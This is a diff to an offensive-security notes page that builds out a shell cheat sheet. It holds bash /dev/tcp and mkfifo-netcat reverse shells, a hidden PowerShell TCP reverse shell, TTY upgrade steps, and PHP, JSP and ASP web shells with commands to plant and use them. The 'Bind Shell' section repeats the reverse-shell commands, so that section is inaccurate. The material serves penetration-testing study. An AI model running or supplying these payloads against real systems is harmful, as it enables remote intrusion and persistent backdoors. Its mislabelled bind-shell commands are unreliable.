--- a/_posts/notes/system/2022-04-25-shell.md
+++ b/_posts/notes/system/2022-04-25-shell.md
@@ -7,26 +7,169 @@ tags: [bash, linux]
 permalink: /notes/system/shell
 ---
 
-# Reverse Shell
-If we can execute code in the victim:
-```console
-... nc -e /bin/sh <ip$ <port$
-```
+# Shell
 
-While in the attacker:
-```console
-$ nc -lvnp <port$
-```
-
+The shells are the main objective to compromise an attacked machine.
 In [revshells](https://www.revshells.com/) we can find more.
 
-## Types
+# Types
 
 | **Type** | **Description** |
 |----------|-----------------|
 | Reverse shell | Connection to a *listener* in the attacked machine |
 | Bind shell | Bind to a port in the attacked machine and waits for the connection |
 | Web shell | Runs commands via the web |
+
+---
+
+# Reverse shell
+
+## Netcat connection
+
+First we need to start a **netcat** in our machine:
+
+```console
+zero@pio$ nc -lvnp 9000
+```
+
+| **Flag**   | **Description**    |
+|--------------- | --------------- |
+| `-l`   | Listen mode   |
+| `-v`   | Verbose mode   |
+| `-n`   | Disable DNS resolution, speed up   |
+| `-p`   | Port number   |
+
+Then we execute the reverse shell command in the objective machine.
+
+## Reverse shell command
+
+Depends on the machine the command may be different. In [PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md) we can found many, as well as in *revshells*.
+
+Some Linux examples can be seen as:
+```bash
+bash -c 'bash -i >& /dev/tcp/<ip>/<port> 0>&1'
+```
+```bash
+rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <ip> <port> >/tmp/f
+```
+
+And Windows:
+```powershell
+powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("<ip>",<port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
+```
+
+---
+
+# Bind Shell
+
+Unlike the reverse shell, we need to make the connection to the bind shell. We can found some scripts in *PayloadsAllTheThings*.
+
+## Bind shell command
+
+As before, there are different commmands for different OS.
+For Linux:
+```bash
+bash -c 'bash -i >& /dev/tcp/<ip>/<port> 0>&1'
+```
+```bash
+rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <ip> <port> >/tmp/f
+```
+
+For Windows:
+```powershell
+powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("<ip>",<port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
+```
+
+## Netcat connection
+
+Then we can start our netcat. We can see that we will connect directly:
+```console
+zero@pio$ nc <ip> <port>
+```
+
+## Upgrading shell
+
+With an Bind shell we are really limited.
+
+Let's use Python to upgrade it:
+```console
+zero@pio$ python -c 'import pty; pty.spawn("/bin/bash")'
+```
+
+Then we press `CTRL + z` to background the shell and use the **stty** command:
+```console
+www-data@machine$ ^Z 
+
+zero@pio$ stty raw -echo
+zero@pio$ fg 
+
+[Enter]
+[Enter]
+www-data@machine$ 
+```
+After, we can press `Enter` or use *reset*.
+
+Maybe the shell does not cover the entire terminal. We can import our configuration:
+```console
+zero@pio$ echo $TERM 
+  xterm-256color
+zero@pio$ stty size
+  67 318
+```
+
+Then in our bind shell:
+```console
+www-data@machine$ export TERM=xterm-256color
+www-data@machine$ stty rows 67 columns 318
+```
+
+---
+
+# Web shell
+
+A web shell is directly in the webpage, for example with PHP or ASPX.
+
+## Writing
+
+This are some of the scripts to execute a web shell:
+```php
+<?php system($_REQUEST["cmd"]); ?>
+```
+
+```jsp
+<% Runtime.getRuntime().exec(request.getParameter("cmd")); %>
+```
+
+```asp
+<% eval request("cmd") %>
+```
+
+## Uploading the shell
+
+Firstly, we need to upload the webshell.
+Secondly, we need to figurate which type of server is:
+| **Server**   | **Default Webroot**    |
+|--------------- | --------------- |
+| Apache   | `/var/www/html/`{: .filepath}   |
+| Nginx   | `/usr/local/nginx/html/`{: .filepath}   |
+| IIS   | `c:\inetpub\wwwroot\`{: .filepath}   |
+| XAMPP   | `C:\xampp\htdocs\`{: .filepath}   |
+
+For example, for a Apache in Linux with a PHP:
+```bash
+echo '<?php system($_REQUEST["cmd"]); ?>' > /var/www/html/shell.php
+```
+
+## Accesing the shell
+
+Access the file through the browser or using cURL. With the option `?cmd=<command>` we can execute it.
+For example: `http://<ip>/shell.php?cmd=whoami` in the web, or with curl:
+```console
+zero@pio$ curl http://<ip>/shell.php?cmd=whoami
+  www-data
+```
+
+---
 
 ## weevely
 To generate a shell:
